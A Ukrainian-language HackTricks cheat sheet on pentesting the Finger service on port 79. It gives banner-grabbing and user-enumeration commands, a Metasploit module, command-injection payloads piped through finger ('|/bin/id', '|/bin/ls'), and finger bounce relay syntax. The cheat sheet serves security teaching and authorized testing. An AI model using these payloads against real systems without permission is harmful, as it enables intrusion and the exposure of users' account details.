# 79 - Пентестинг Finger
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! Інші способи підтримки HackTricks: * Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! * Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) * Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) * **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**.
## **Основна інформація** Програма/сервіс **Finger** використовується для отримання деталей про користувачів комп'ютера. Зазвичай надана інформація включає **логін користувача, повне ім'я**, а також у деяких випадках додаткові деталі. Ці додаткові деталі можуть включати місце розташування офісу та номер телефону (якщо доступно), час, коли користувач увійшов у систему, період неактивності (час простою), останній раз, коли користувач переглядав пошту, а також вміст файлів плану та проекту користувача. **Порт за замовчуванням:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Перелік** ### **Отримання банера/Основне з'єднання** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Перелік користувачів** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Альтернативно, ви можете використовувати **finger-user-enum** від [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), деякі приклади: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap виконує скрипт для використання стандартних скриптів** ### Metasploit використовує більше трюків, ніж Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 КОРИСТУВАЧ` ## Виконання команд ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Використовуйте систему як реле для finger](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ```
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! Інші способи підтримки HackTricks: * Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! * Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) * Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) * **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**.